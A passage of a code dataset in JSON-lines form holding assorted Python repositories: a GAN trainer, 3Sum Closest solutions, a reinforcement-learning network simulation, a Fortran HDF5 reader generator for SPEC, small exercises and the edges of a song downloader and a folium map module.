\".mp3\")\n print(\"Downloaded \" + song_name)\n except:\n print(\"Could not download \" + song_name)\n os.remove(dl_file)\n print(\"\")\n webbrowser.open(path)\n \ndef main():\n INITIALIZE_VARIABLES()\n\n ACCESS_TOKEN = Authorization()\n Playlist_Data = Get_Playlist_Songs(ACCESS_TOKEN)\n Youtube(Playlist_Data)\n #Display_Playlist(Playlist_Data)\n\nif __name__ == \"__main__\":\n main()\n print(\"----------The End----------\")","repo_name":"rajmoham/Song-Downloader","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5014726937","text":"import wandb\nwandb.init(project='gan')\nimport torch, torch.optim as optim\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom net import Generator, Discriminator, real_loss, fake_loss\n\ndef datamaker(batch_size=1):\n train_dataset = datasets.MNIST(root='dataset', \n train=True, \n transform=transforms.ToTensor(),\n download=True)\n\n train_loader = torch.utils.data.DataLoader(train_dataset, \n batch_size=batch_size,\n num_workers=2)\n\n return train_loader\n\ndef train(batch_size=1, latent_size=100, learning_rate=2e-3, num_epochs=100):\n cuda = torch.cuda.is_available()\n device = 'cuda:0' if cuda else 'cpu'\n dataloader = datamaker(batch_size=batch_size)\n fixed_img = np.random.uniform(-1, 1, size=(batch_size, latent_size))\n fixed_img = torch.from_numpy(fixed_img).float()\n gen_imgs = []\n\n G = Generator(input_size=latent_size)\n D = Discriminator()\n if cuda:\n print('Using CUDA')\n fixed_img = fixed_img.cuda()\n G.cuda()\n D.cuda()\n \n\n\n g_optimizer = optim.Adam(G.parameters(), lr=learning_rate)\n d_optimizer = optim.Adam(D.parameters(), lr=learning_rate)\n\n wandb.watch(G)\n wandb.watch(D)\n for epoch in range(num_epochs):\n D.train()\n G.train()\n for idx, ( real_images, _ ) in enumerate(tqdm(dataloader)):\n if cuda:\n real_images = real_images.cuda()\n\n batch_size = real_images.size(0)\n real_images = real_images * 2 - 1\n\n g_loss_value = 0.0\n d_loss_value = 0.0\n for phase in ['discriminator', 'generator']:\n # TRAIN DISCRIMINATOR\n if phase == 'discriminator':\n # generate fake images from latent vector\n latent_vector = np.random.uniform(-1, 1, size=(batch_size, latent_size))\n latent_vector = torch.from_numpy(latent_vector).float()\n if cuda:\n latent_vector = latent_vector.cuda()\n fake_images = G(latent_vector)\n\n # compute discriminator loss on real images\n d_optimizer.zero_grad()\n d_real = D(real_images)\n d_real_loss = real_loss(d_real, smooth=True)\n\n # compute discriminator loss in fake images\n d_fake = D(fake_images)\n d_fake_loss = fake_loss(d_fake)\n\n # total loss, backprop, optimize and update weights\n d_loss = d_real_loss + d_fake_loss\n d_loss_value = d_loss.item()\n\n d_loss.backward()\n d_optimizer.step()\n\n # TRAIN GENERATOR\n if phase == 'generator':\n latent_vector = np.random.uniform(-1, 1, size=(batch_size, latent_size))\n latent_vector = torch.from_numpy(latent_vector).float()\n if cuda:\n latent_vector = latent_vector.cuda()\n fake_images = G(latent_vector)\n \n g_optimizer.zero_grad()\n d_fake = D(fake_images)\n g_loss = real_loss(d_fake)\n g_loss_value = g_loss.item()\n\n g_loss.backward()\n g_optimizer.step()\n\n if idx % 100 == 0: \n pass\n wandb.log({ 'G Loss': g_loss_value, 'D Loss': d_loss_value })\n wandb.log({ 'G Epoch Loss': g_loss_value, 'D Epoch Loss': d_loss_value }, step=epoch)\n \n # test performance\n G.eval()\n gen_img = G(fixed_img)\n gen_imgs.append(gen_img)\n \n # dump generated images\n with open('gen_imgs.pkl', 'wb') as f:\n pkl.dump(gen_imgs, f)\n\n\nif __name__ == '__main__':\n # data_iter = iter(train_loader)\n # images, labels = next(data_iter)\n # images = torch.squeeze(images, 0).permute(1,2,0)\n # images = torch.cat((images, images, images), dim=2)\n # print(images.size())\n # plt.imshow(images)\n # plt.show()\n\n train(batch_size=128)","repo_name":"blueyellowpink/gan","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14311708568","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ncalculate repeats similaritites for WDSP output file\nusage: python repeat_similarity.py wdsp_f\n\"\"\"\nimport sys\nfrom collections import OrderedDict\nfrom wdsp import Wdsp\n\n\ndef align(seq1, seq2):\n from Bio import pairwise2\n from Bio.SubsMat import MatrixInfo as matlist\n matrix = matlist.blosum62\n gap_open = -10 # usual value\n gap_extend = -0.5 # usual value\n\n alns = pairwise2.align.globalds(seq1, seq2, matrix, gap_open, gap_extend)\n\n seq1 = alns[0][0]\n seq2 = alns[0][1]\n identity = [1 for i, s in enumerate(seq1) if s == seq2[i]]\n identity = int(100 * len(identity) / len(seq1))\n\n return identity\n\n\ndef repeat_similarity(repeats):\n lens = len(repeats)\n sims = []\n for i in xrange(lens):\n sim_i = []\n for j in xrange(lens):\n if j < i:\n sim_i.append(sims[j][i])\n elif j >= i:\n sim_i.append(align(repeats[i], repeats[j]))\n sims.append(sim_i)\n average = (sum([sum(i) for i in sims]) - lens * 100) / (lens * (lens - 1))\n return average, sims\n\n\ndef main():\n with open(sys.argv[-1]) as o_f:\n w = Wdsp(o_f)\n sims = OrderedDict()\n for pro, repeats in w.repeats.iteritems():\n sims[pro] = repeat_similarity(repeats)\n\n with open('sims.txt', 'w') as w_f:\n for k, v in sims.iteritems():\n print >> w_f, '{0:<20}{1:<}'.format(k, v[0])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lituan/Topface","sub_path":"repeat_similarity.py","file_name":"repeat_similarity.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42272391708","text":"from CSMA_agent import CsmaAgent\nimport gym\nfrom custom_env import threshold_env\nfrom DQN import KerasDQN\nimport numpy as np\nimport csv\n\n# --------------------> Parameters <--------------------\nsave = True # Save data to CSV\nsave_data_path = \"./data/\"\nn_iterations = 3 # How many full simulations to run\nfeature_histories = 1\n# ------------------------------------------------------------\n\n# --------------------- Create Env ---------------------\nn_agents = 4 \nthreshold = 1 \nn_steps = 1e4\ntransmit_and_sense = False\n# With buffer intervals\nbuffer_intervals = [2, 5, 8, 10] * 4\nenv = threshold_env(n_agents, threshold, n_steps, \n transmit_and_sense=transmit_and_sense,\n buffer_intervals=buffer_intervals)\n\"\"\"\nenv = threshold_env(n_agents, threshold, n_steps, \n transmit_and_sense=transmit_and_sense)\n\"\"\"\n# -----------------------------------------------------\n\n\ndef state_to_observations(state):\n \"\"\"\n Input:\n - obs [list or np.array]: Concatenated list of all observations\n\n Returns:\n - list of lists of observations for each agent\n \"\"\"\n n_obs_per_agent = len(state) // n_agents\n #print(\"n_obs_per_agent\", n_obs_per_agent)\n agent_obs = [np.array(state[i * n_obs_per_agent: (i + 1) * n_obs_per_agent]).reshape(1, -1) for i in range(n_agents)]\n\n return agent_obs\n\n# ---------------------- Training Loop --------------------\ncurrIt = 0\nwhile True:\n # --------------------- Create Agents ---------------------\n n_inputs = 4 * feature_histories \n n_actions = 5 \n # DQN\n \"\"\"\n agents = [KerasDQN(n_inputs, n_actions,\n hidden_layer_one_dims=128,\n hidden_layer_two_dims=256,\n batch_size=64,\n epsilon_min=0.05) for _ in range(n_agents)]\n \"\"\"\n # CSMA Agents\n #agents = [CsmaAgent(wait_for_idle=True) for _ in range(n_agents)]\n #agents = [CsmaAgent(wait_for_idle=True, back_off_strategy=\"fixed\", p=n_actions) for _ in range(n_agents)]\n #agents = [CsmaAgent(wait_for_idle=False) for _ in range(n_agents)] # not used in paper\n agents = [CsmaAgent(wait_for_idle=False, back_off_strategy=\"fixed\", p=n_actions) for _ in range(n_agents)]\n # ------------------------------------------------------\n\n stepIdx = 0\n rewards = []\n action_list = []\n states = []\n scores = [[] for _ in range(n_agents)] # is this the same as rewards?\n rewards = []\n\n state = env.reset() # If I refactor state, make this work\n state = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n next_state = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n\n # For multi-step actions\n state_at_action = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n future_actions = [[] for _ in range(n_agents)]\n action_duration = [0 for _ in range(n_agents)]\n reward_over_actions = [[] for _ in range(n_agents)]\n actions = [0 for _ in range(n_agents)] # Action selected by the agent (could be multi-step)\n actions_to_take = [0 for _ in range(n_agents)] # do/don't transmit on this step. In {0, 1}\n \n while True:\n # Get Actions ------------------------------\n for i in range(n_agents):\n # if buffer is 0 don't use RL, also don't save if no RL was used\n if state[i][0][-1] == 0:\n #actions.append(-1) # Original\n actions[i] = -1\n future_actions[i] = [-1]\n\n # If the action_duration is 0, get a new action,\n elif action_duration[i] == 0: # make sure this can't be negative\n # Get action, save state, set future actions, and action_duration\n agent_action = agents[i].choose_action(state[i])\n state_at_action[i] = state[i]\n\n if agent_action == 0:\n future_actions[i] = [0]\n elif agent_action == 1:\n future_actions[i] = [1]\n elif agent_action == 2:\n future_actions[i] = [0, 1]\n elif agent_action == 3:\n future_actions[i] = [0, 0, 1]\n elif agent_action == 4:\n future_actions[i] = [0, 0, 0, 1]\n elif agent_action == 5:\n future_actions[i] = [0, 0, 0, 0, 1]\n elif agent_action == 6:\n future_actions[i] = [0, 0, 0, 0, 0, 1]\n elif agent_action == 7:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 1]\n elif agent_action == 8:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 1]\n elif agent_action == 9:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 0, 1]\n elif agent_action == 10:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n else:\n raise ValueError\n\n \"\"\"\n # Idea to try for 10 agents\n if agent_action == 0:\n future_actions[i] = [0]\n elif agent_action == 1:\n future_actions[i] = [1]\n elif agent_action == 2:\n future_actions[i] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n \"\"\"\n\n # Update actions if a new decision is made\n actions[i] = agent_action\n\n action_duration[i] = len(future_actions[i])\n\n # Set action to take by popping future action\n actions_to_take[i] = future_actions[i].pop(0)\n # -------------------------------------------------------------------\n\n # Take an environment step\n new_state_info, reward, done, info = env.step(actions_to_take)\n next_state = state_to_observations(new_state_info)\n\n # Decrement all action durations\n action_duration = [duration - 1 for duration in action_duration]\n\n # Remember reward and transitions\n for i in range(n_agents):\n agent_action = actions[i]\n\n # Check if RL was not used\n if agent_action == -1: # RL agent not invoked. Do not save transition to memory\n continue\n\n # Add reward to reward_over_actions\n agent_reward = reward[i] # For now, reward is the same for all agents\n reward_over_actions[i].append(agent_reward)\n\n # Save transitions only when action_duration == 0\n if action_duration[i] == 0:\n agent_state = state_at_action[i]\n agent_next_state = next_state[i]\n\n # Average reward\n agent_average_reward_over_action = float(np.mean(reward_over_actions[i]))\n # Save transition with the state at the time of the action decision and\n # the average reward over the course of the action\n agents[i].remember(agent_state, agent_action, agent_average_reward_over_action,\n agent_next_state, done)\n\n agents[i].learn() # Could be moved outside of the \"if\" block\n\n # Clear reward_over_actions\n reward_over_actions = [[] for _ in range(n_agents)]\n\n #print(\"actions\", actions)\n\n for i in range(n_agents):\n scores[i].append(reward[i])\n\n rewards.append(reward.copy())\n action_list.append(actions.copy())\n states.append(state)\n\n state = next_state\n\n stepIdx += 1\n if stepIdx % 100 == 0:\n print(\"Step: \", stepIdx)\n for i in range(n_agents):\n print(\"mean (last 50)\", np.mean(scores[i][-50:]))\n if i == (n_agents - 1):\n print()\n\n if done:\n # Record data in CSV\n if save == True:\n data = [list(reward) + list(action) + list(np.array(state).flatten()) for reward, action, state in zip(rewards, action_list, states)]\n with open(save_data_path + \"data\" + str(currIt) + \".csv\", \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(data)\n break\n\n currIt += 1\n if currIt == n_iterations:\n break\n","repo_name":"Farquhar13/RL_Transmission_Control","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"73967604729","text":"import pickle\nnumlst=list(range(1,51))\nprint(numlst)\n'''\nfor i in range(1,51):\n f=open('{0}주차.txt'.format(i),'w',encoding='utf8')\n f.write('- {0} 주차 주간보고 -\\n'.format(i))\n f.write('부서 :\\n이름 :\\n업무 요악 :')\nf.close()\n\nfor i in range(1,51):\n f=open('{0}주차.txt'.format(i),'r',encoding='utf8')\n print(f.read())\nf.close()\n\nfor i in range(1,51):\n f=open(\"{0}주차.pickle\".format(i),\"wb\")\n content='- {0} 주차 주간보고 -\\n부서 :\\n업무 :\\n업무 요약 :'.format(i)\n pickle.dump(content,f)\n f.close()\n\nfor i in range(1,51):\n f=open(\"{0}주차.pickle\".format(i),\"rb\")\n content = pickle.load(f)\n print(content)\n f.close()\n\nfor i in range(1,51):\n with open(\"{0}주차.txt\".format(i),'r',encoding='utf8') as f:\n print(f.read())\n'''\n\nwith open(\"{n}주차.txt\".format(n=numlst[:50]),'r',encoding='utf8') as f:\n print(f.read())\n","repo_name":"beans3142/study_language","sub_path":"나도코딩 파이썬/6H코딩/퀴즈/퀴즈6/퀴즈6.py","file_name":"퀴즈6.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14990791045","text":"# 16. 3Sum Closest\n# 🟠 Medium\n#\n# https://leetcode.com/problems/3sum-closest/\n#\n# Tags: Array - Two Pointers - Sorting\n\nimport timeit\nfrom typing import List\n\n\n# Sort the input, fix one element starting from the left and use\n# two pointers encircling the remaining window to calculate possible\n# sums. When the current sum is bigger than target, shrink the window\n# from the right, when smaller, shrink it from the left, this allows us\n# to find the best 3sum with each element in O(n).\n#\n# Time complexity: O(n^2) - For each element, we find the best 3sum that\n# contains it in linear time.\n# Space complexity: O(1) - We keep one sum and 3 pointers in memory.\n#\n# Runtime: 7216 ms, faster than 40.63%\n# Memory Usage: 14 MB, less than 88.54%\nclass LoopAndTwoPointers:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n # If we only have 3 elements, return the input.\n if len(nums) < 4:\n return sum(nums)\n # Sort the input to be able to use a two pointer approach.\n nums.sort()\n # We are guaranteed to have at least 3 elements.\n closest = sum(nums[:3])\n # The outer loop iterates over all the values except the last\n # two, these are covered by the left and right pointer.\n for idx in range(len(nums) - 2):\n # Use a left and right pointer to calculate possible 3 sums.\n # Initialize the pointers to the biggest possible window.\n left, right = idx + 1, len(nums) - 1\n # Check sums while we haven't checked them all.\n while left < right:\n current = nums[idx] + nums[right] + nums[left]\n # If the current sum is greater than the target, find a\n # smaller sum by moving left the right pointer.\n if current > target:\n right -= 1\n # If the current sum is less than the target, find a\n # larger sum by moving right the left pointer.\n elif current < target:\n left += 1\n # If the target equals the sum, return the values, this\n # is the only match.\n else:\n return current\n # Check all possible sums against the best.\n if abs(current - target) < abs(closest - target):\n closest = current\n\n return closest\n\n\n# We can extend the previous solution to come up with a generic\n# solution that finds the sum of k elements that comes closer to target.\n#\n# Time complexity: O(n^2) - For each element, we find the best 3sum that\n# contains it in linear time.\n# Space complexity: O(n) - We keep the reversed input and use list\n# comprehension to calculate the result, linear space.\nclass KSum:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n nums.sort()\n return self.kSumClosest(nums, target, 3)\n\n def kSumClosest(self, nums: List[int], target: int, k: int) -> int:\n n = len(nums)\n if k == n:\n return sum(nums[:k])\n\n current = sum(nums[:k])\n if current >= target:\n return current\n\n current = sum(nums[-k:])\n if current <= target:\n return current\n\n if k == 1:\n return min(\n [(x, abs(target - x)) for x in nums],\n key=lambda tuple: tuple[1],\n )[0]\n\n closest = sum(nums[:k])\n for i in range(n - k + 1):\n if i > 0 and nums[i - 1] == nums[i]:\n continue\n\n current = (\n self.kSumClosest(nums[i + 1 :], target - nums[i], k - 1)\n + nums[i]\n )\n if abs(target - current) < abs(target - closest):\n if current != target:\n closest = current\n else:\n return target\n\n return closest\n\n\ndef test():\n executors = [\n LoopAndTwoPointers,\n KSum,\n ]\n tests = [\n [[-1, 2, 1, -4], 1, 2],\n [[0, 0, 0], 1, 0],\n [[1, 1, 1, 1], 0, 3],\n ]\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for n, t in enumerate(tests):\n sol = executor()\n result = sol.threeSumClosest(t[0], t[1])\n exp = t[2]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for \"\n + f\"test {n} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"leetcode/3sum-closest.py","file_name":"3sum-closest.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"45794013324","text":"\"\"\"\nDesenvolva um programa que leia seis números inteiros e mostre a soma apenas\ndaqueles que forem pares. Se o valor digitado for ímpar, descondidere-o\n\"\"\"\nsoma = 0\ncont = 0\nfor n in range(1, 7):\n num = int(input(f'Digite o {n}º número inteiro: '))\n if num % 2 == 0:\n soma += num\n cont += 1\nprint(f'Você informou {cont} números PARES e a soma destes é igual a {soma}.')\n","repo_name":"judigunkel/Exercicios-Python","sub_path":"Mundo 2/ex050.py","file_name":"ex050.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16134966407","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 15:17:47 2019\n\n@author: Jonathan Schilling (jonathan.schilling@ipp.mpg.de)\n\"\"\"\n\n#%% prepare for code generation\n\ndef indented(tabs, lines, indentationChar=\"\\t\"):\n indentation = \"\"\n for i in range(tabs):\n indentation += indentationChar\n indented = ''\n if '\\n' in lines.strip():\n for line in lines.split('\\n'):\n if line != '':\n indented += indentation+line+'\\n'\n else:\n indented = indentation+lines#.strip()\n return indented\n\ndef indent(tabs, lines, indentationChar=\"\\t\"):\n return tabs+1, indented(tabs, lines, indentationChar)\n\ndef unindent(tabs, lines, indentationChar=\"\\t\"):\n return tabs-1, indented(tabs, lines, indentationChar)\n\n\n#%% document who created the reading routines when on which machine\n\nfrom datetime import datetime\nimport getpass\nimport platform\n\n# dd/mm/YY H:M:S in UTC\nnow_string = datetime.utcnow().strftime('%d/%m/%Y %H:%M:%S UTC')\nusername = getpass.getuser()\nhostname = platform.node()\n\ncreation_tag = 'auto-created by a user called \\''+username+'\\' on a machine called \\''+hostname+'\\' at '+now_string\n\n#%% generate Fortran type declarations\nfrom Hdf5File import Group, Dataset, Datatype\n\n# datatype in Fortran from specification file\ndef fortran_dtype(dtype):\n if dtype=='int':\n return 'INTEGER'\n elif dtype=='double':\n return 'DOUBLE PRECISION'\n elif dtype=='boolean':\n return 'LOGICAL'\n else:\n return 'TYPE('+dtype.upper()+')'\n\n# generate custom compound datatype declaration in Fortran\ndef fortran_genType(name, members):\n ret = 'TYPE '+name+'\\n'\n for member in members:\n if type(member) == Group or type(member) == Datatype:\n ret += ' TYPE('+member.name+')'\n else:\n ret += ' '+fortran_dtype(member.dtype)\n if member.rank>0:\n ret += ', ALLOCATABLE'\n ret += ' :: '+member.name\n if type(member) != Group and member.rank>0:\n ret += '('\n for i in range(member.rank):\n if i>0:\n ret += ',:'\n else:\n ret += ':'\n ret += ')'\n ret += '\\n'\n ret += 'END TYPE '+name\n return ret\n\n# initial code of loading routine\ndef fortran_startLoader(f):\n f.write(\"\"\"subroutine loadSpec(s, filename, ierr)\n use hdf5\n implicit none\n type(SpecOutput), intent(inout) :: s ! target datastructure\n character(len=*), intent(in) :: filename ! filename to load\n integer, intent(out), optional :: ierr ! error flag; .eq.0 if ok\n integer :: hdfier ! error flag for HDF5 API calls\n integer(hid_t) :: file_id ! identifier for current file\n integer(hid_t) :: dset_id ! temporary dataset id\n integer(hid_t) :: dataspace ! dataspace used to query dataset size\n integer(hsize_t) :: dims_1(1) ! current dimensions of rank-1 dataset\n integer(hsize_t) :: dims_2(2) ! current dimensions of rank-2 dataset\n integer(hsize_t) :: dims_3(3) ! current dimensions of rank-3 dataset\n integer(hsize_t) :: max_dims_1(1) ! maximum dimensions of rank-1 dataset\n integer(hsize_t) :: max_dims_2(2) ! maximum dimensions of rank-2 dataset\n integer(hsize_t) :: max_dims_3(3) ! maximum dimensions of rank-3 dataset\n integer :: logical_tmp ! temporary integer used to read logicals\n \n call h5open_f(hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening HDF5 library\" ; goto 9999 ; endif\n\n call h5fopen_f(filename, H5F_ACC_RDONLY_F, file_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening HDF5 file '\",filename,\"'\" ; goto 9998 ; endif\n\"\"\")\n\n# finalizing code of loading routine\ndef fortran_endLoader(f):\n f.write(\"\"\"\n9998 continue\n \n call h5fclose_f(file_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing HDF5 file '\",filename,\"'\" ; ierr = hdfier ; endif\n\n9999 continue\n\n call h5close_f(hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing HDF5 library\" ; ierr = hdfier ; endif \n \nend subroutine loadSpec\n\"\"\")\n\n# write demo code\ndef fortran_demoLoader(f):\n f.write(\"\"\"\nprogram test_read_spec\n use read_spec\n implicit none\n type(SpecOutput) :: s\n character(*), parameter :: filename = \"/home/jonathan/Uni/04_PhD/00_programs/SPEC/SPEC/InputFiles/TestCases/G3V02L1Fi.001.h5\"\n \n write(*,*) \"reading '\",filename,\"'...\"\n call loadSpec(s, filename)\n write(*,*) \"done\"\n \n write(*,\"(A,F4.2)\") \"SPEC version: \", s%version\n write(*,\"(A,99I2)\") \"Lrad:\", s%input%physics%Lrad\n \n call freeSpec(s)\nend program test_read_spec\n\"\"\")\n\n# read a scalar (int or double) from HDF5 variable srcPath into the source code variable targetPath\ndef fortran_loadItem(f, item):\n \n srcName = item.getFullName()\n \n targetName = \"s\"+srcName.replace(\"/\",\"%\")\n if item.rank>0:\n targetName += \"(\"\n if item.indexMapping is not None:\n for dim,idxRange in enumerate(item.indexMapping):\n if dim==0:\n targetName += idxRange\n else:\n targetName += \", \"+idxRange\n else:\n for dim in range(item.rank):\n if dim==0:\n targetName += \"1:dims_\"+str(item.rank)+\"(1)\"\n else:\n targetName += \", 1:dims_\"+str(item.rank)+\"(\"+str(dim+1)+\")\"\n targetName += \")\"\n \n #print(\"read {} into {}\".format(srcName, targetName))\n \n # translate dtype into HDF5 type\n h5type='ERROR'\n if item.dtype=='double':\n h5type='H5T_NATIVE_DOUBLE'\n elif item.dtype=='int' or item.dtype=='boolean':\n h5type='H5T_NATIVE_INTEGER'\n else:\n h5type='TYPE('+item.dtype.upper()+')'\n \n \n \n \n if item.rank==0:\n if (item.dtype=='boolean'):\n fmt=\"\"\"\n! {srcName} --> {targetName}; rank={rank}; h5type={h5type}\n call h5dopen_f(file_id, \"{srcName}\", dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dread_f(dset_id, {h5type}, logical_tmp, int((/1/), HSIZE_T), hdfier)\n {targetName} = merge(.TRUE., .FALSE., logical_tmp.ne.0)\n if (hdfier.ne.0) then ; write(*,*) \"error reading dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dclose_f(dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataset '{srcName}'\" ; goto 9998 ; endif\n\"\"\"\n else:\n fmt=\"\"\"\n! {srcName} --> {targetName}; rank={rank}; h5type={h5type}\n call h5dopen_f(file_id, \"{srcName}\", dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dread_f(dset_id, {h5type}, {targetName}, int((/1/), HSIZE_T), hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error reading dataset '{srcName}'\" ; goto 9998 ; endif\n call h5dclose_f(dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataset '{srcName}'\" ; goto 9998 ; endif\n\"\"\"\n else:\n if (item.dtype=='boolean'):\n print(\"ERROR: cannot generate reader for logical array '\"+srcName+\"' yet!\")\n fmt=\"\"\"\n! {srcName} --> {targetName}; rank={rank}\n call h5dopen_f(file_id, \"{srcName}\", dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error opening dataset '{srcName}'\" ; goto 9998 ; endif\n \n ! open dataspace to get current state of dataset\n call h5dget_space_f(dset_id, dataspace, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error getting dataspace for dataset '{srcName}'\" ; goto 9998 ; endif\n \n ! get current size of dataset\n call h5sget_simple_extent_dims_f(dataspace, dims_{rank}, max_dims_{rank}, hdfier)\n if (hdfier.ne.{rank}) then ; write(*,*) \"unexpected rank of dataset '{srcName}': \",hdfier,\" .ne. {rank}\" ; goto 9998 ; endif\n\n ! close dataspace after it has been used to query the size of the variable\n call h5sclose_f(dataspace, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataspace for dataset '{srcName}'\" ; goto 9998 ; endif\n \n allocate({targetName})\n \n call h5dread_f(dset_id, {h5type}, {targetName}, dims_{rank}, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error reading dataset '{srcName}'\" ; goto 9998 ; endif\n \n call h5dclose_f(dset_id, hdfier)\n if (hdfier.ne.0) then ; write(*,*) \"error closing dataset '{srcName}'\" ; goto 9998 ; endif\n\"\"\"\n f.write(fmt.format(srcName=srcName, targetName=targetName, h5type=h5type, rank=item.rank))\n \n# initial code of loading routine\ndef fortran_startFree(f):\n f.write(\"\"\"subroutine freeSpec(s)\n implicit none\n type(SpecOutput), intent(inout) :: s ! datastructure to free\n\"\"\")\n\n# finalizing code of loading routine\ndef fortran_endFree(f):\n f.write(\"\"\"end subroutine freeSpec\n\"\"\")\n\n# free an allocated item of rank .ge. 1\ndef fortran_freeItem(f, item):\n \n srcName = item.getFullName()\n targetName = \"s\"+srcName.replace(\"/\",\"%\")\n \n if (item.rank > 0):\n print(\"free {}\".format(targetName))\n f.write(\" deallocate(\"+targetName+\")\\n\")\n \n\n#%% actually generate Fortran module for reading SPEC output files\ndef genFortranReader(outdir, moduleName, s):\n \n # we need to reverse the definition order so that types which are used inside other types\n # are already defined when used\n reverse_rootStack = []\n \n rootStack = []\n rootStack.append(s.rootGroup)\n while len(rootStack)>0:\n currentItem = rootStack[-1]\n rootStack = rootStack[:-1]\n \n if currentItem is not s.rootGroup:\n reverse_rootStack.append(currentItem)\n if type(currentItem)==Group:\n for item in currentItem.items:\n rootStack.append(item)\n \n \n fortranFilename = outdir+moduleName+\".f90\"\n print(\"creating Fortran reading module into '\"+fortranFilename+\"'\")\n \n # begin code for root group (== enclosing class)\n f=open(fortranFilename, \"w\")\n \n f.write(\"\"\"! AUTO-GENERATED; DO NOT COMMIT CHANGES TO THIS FILE !\n! \"\"\"+creation_tag+\"\"\"\nmodule \"\"\"+moduleName+\"\\n\")\n \n # custom datatypes come first\n for dtype in s.getDatatypes():\n f.write(fortran_genType(dtype.name, dtype.items)+'\\n')\n \n # we need to reverse the definition order so that types which are used inside other types\n # are already defined when used\n reverse_groupStack = []\n \n groupStack = []\n groupStack.append(s.rootGroup)\n while len(groupStack)>0:\n currentGroup = groupStack[-1]\n groupStack = groupStack[:-1]\n \n if type(currentGroup)==Group:\n reverse_groupStack.append(currentGroup)\n \n for item in currentGroup.items:\n if type(item)==Group:\n groupStack.append(item)\n \n # iterate in reverse order over the discovered variables to generate type definitions in correct order\n for currentGroup in reverse_groupStack[::-1]:\n f.write(fortran_genType(currentGroup.name, currentGroup.items)+'\\n')\n \n f.write(\"contains\\n\")\n \n # initial code of loading routine\n fortran_startLoader(f)\n \n # loop over all variables again and put the loader code for each of them one after another\n for currentGroup in reverse_groupStack[::-1]:\n for item in currentGroup.items:\n if type(item)==Dataset:\n fortran_loadItem(f, item)\n \n # finalizing code of loading routine\n fortran_endLoader(f)\n \n # write the freeSpec subroutine to free the memory it occupied\n fortran_startFree(f)\n \n for currentGroup in reverse_groupStack[::-1]:\n for item in currentGroup.items:\n if type(item)==Dataset:\n fortran_freeItem(f, item)\n \n # finalizing code of freeing routine\n fortran_endFree(f)\n \n f.write(\"end module read_spec\\n\")\n\n # write demo code\n #fortran_demoLoader(f)\n\n f.close()","repo_name":"PrincetonUniversity/SPEC","sub_path":"Utilities/pythontools/misc/genFortran.py","file_name":"genFortran.py","file_ext":"py","file_size_in_byte":12045,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"74259599289","text":"import random\nfrom typing import Any\n\nimport folium\n\nfrom models import LocationInDb\nfrom config import app\n\n\nCOLORS = [\n \"red\",\n \"blue\",\n \"green\",\n \"purple\",\n \"orange\",\n \"darkred\",\n \"lightred\",\n \"beige\",\n \"darkblue\",\n \"darkgreen\",\n \"cadetblue\",\n \"darkpurple\",\n \"pink\",\n \"lightblue\",\n \"lightgreen\",\n]\n\n\ndef create_map(locations: list[LocationInDb]) -> folium.Map:\n if locations:\n loc = locations[0]\n m = 